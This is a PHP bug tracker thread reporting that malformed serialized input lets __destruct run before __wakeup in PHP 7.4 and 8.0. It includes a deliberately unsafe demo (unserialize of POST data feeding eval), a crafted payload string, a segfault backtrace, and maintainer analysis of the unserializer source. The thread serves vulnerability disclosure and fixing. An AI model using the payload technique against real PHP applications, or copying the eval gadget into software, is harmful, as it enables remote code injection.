unserialize __wakeup bypass

[Oatmeal-Lin]

Description

The following code:

<?php

class A
{
    public $info;
    private $end = "1";

    public function __destruct()
    {
        $this->info->func();
    }
}

class B
{
    public $end;

    public function __wakeup()
    {
        $this->end = "exit();";
        echo '__wakeup';
    }

    public function __call($method, $args)
    {
        eval('echo "aaaa";' . $this->end . 'echo "bbb"');
    }
}

unserialize($_POST['data']);

I found an interesting bug. When the deserialized string contains a variable name with the wrong string length, the deserialization continues, but the __destruct() function is called before __wakeup is called. This way you can bypass __wakeup().

I've tested it on some versions and I'm not sure if others have this problem, it's also useful in the latest version.

• 7.4.x -7.4.30
• 8.0.x

[POST]data=O:1:"A":2:{s:4:"info";O:1:"B":1:{s:3:"end";N;}s:6:"Aend";s:1:"1";}

This event also is triggered when

• delete )
• Inconsistent number of class attributes
• The length of the attribute key does not match.
• The length of the attribute value does not match.
• delete ;

Expected Results：

aaaa bbb __wakeup

PHP Version

PHP 7.4.x PHP8.0.x

Operating System

Windows/Linux

[cmb69]

Thanks for forwarding this from the old bug tracker. I can confirm the bad behavior: https://3v4l.org/qpCCg.

[cmb69]

Interestingly, I get a segfault with current master (but not with older branches).

Stack backtrace:

>	php8_debug.dll!object_common(_zval_struct * rval, const unsigned char * * p, const unsigned char * max, php_unserialize_data * * var_hash, __int64 elements, bool has_unserialize) Line 811	C
 	php8_debug.dll!php_var_unserialize_internal(_zval_struct * rval, const unsigned char * * p, const unsigned char * max, php_unserialize_data * * var_hash) Line 1320	C
 	php8_debug.dll!php_var_unserialize(_zval_struct * rval, const unsigned char * * p, const unsigned char * max, php_unserialize_data * * var_hash) Line 845	C
 	php8_debug.dll!php_unserialize_with_options(_zval_struct * return_value, const char * buf, const unsigned __int64 buf_len, _zend_array * options, const char * function_name) Line 1400	C
 	php8_debug.dll!zif_unserialize(_zend_execute_data * execute_data, _zval_struct * return_value) Line 1451	C
 	php8_debug.dll!ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER(_zend_execute_data * execute_data) Line 1253	C
 	php8_debug.dll!execute_ex(_zend_execute_data * ex) Line 55793	C
 	php8_debug.dll!zend_execute(_zend_op_array * op_array, _zval_struct * return_value) Line 60368	C
 	php8_debug.dll!zend_execute_scripts(int type, _zval_struct * retval, int file_count, ...) Line 1781	C
 	php8_debug.dll!php_execute_script(_zend_file_handle * primary_file) Line 2537	C
 	php.exe!do_cli(int argc, char * * argv) Line 966	C
 	php.exe!main(int argc, char * * argv) Line 1333	C
 	[External Code]	

[Oatmeal-Lin]

It looks like this bug is only present in the latest versions and doesn't work in older versions of PHP7 and PHP5. A few things were added afterward.

[TysonAndre]

Looking at the code, the intent is to prevent calling __destruct of an object instance if its __wakeup (or __unserialize, introduced in 7.4) method hasn't been done yet, in cases where __wakeup is used to assert that the object hasn't been passed malicious data by an unserializers.

• This is calling the destructor of a different object with no __wakeup
• I think deferring __wakeup until all data was processed (to fix another security bug) might have been the relevant change, haven't looked into it

For objects that don't have __wakeup, or for objects where __wakeup has successfully been called, their destructors are allowed to be called.

e.g. the snippet in question that adds IS_OBJECT_DESTRUCTOR_CALLED - it'll prevent calling destructors of all of the objects created with a VAR_WAKEUP_FLAG, but not of other objects.

// ext/standard/var_unserializer.re object_common
	if (!process_nested_object_data(UNSERIALIZE_PASSTHRU, ht, elements, Z_OBJ_P(rval))) {
		if (has_wakeup) {
			ZVAL_DEREF(rval);
			GC_ADD_FLAGS(Z_OBJ_P(rval), IS_OBJ_DESTRUCTOR_CALLED);
		}
		return 0;
	}
// ...

	if (has_wakeup) {
		/* Delay __wakeup call until end of serialization */
		zval *wakeup_var = var_tmp_var(var_hash);
		ZVAL_COPY(wakeup_var, rval);
		Z_EXTRA_P(wakeup_var) = VAR_WAKEUP_FLAG;
	}

There's plenty of other ways to trigger destructors of objects that don't have __wakeup defined, e.g. by duplicate array keys freeing the old value, etc.